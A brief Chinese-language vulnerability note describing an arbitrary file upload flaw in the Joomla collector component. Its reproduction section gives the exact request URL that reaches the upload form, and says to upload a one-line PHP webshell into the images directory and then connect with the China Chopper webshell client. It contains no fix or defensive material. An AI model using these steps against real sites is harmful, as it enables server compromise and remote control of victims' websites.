漏洞简介 jomla collector组件不正确校验用户提交的输入,允许攻击者利用漏洞上传恶意攻击php代码。 漏洞复习 构造语句 ip/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1 在images目录下上传一句话木马 然后菜刀连接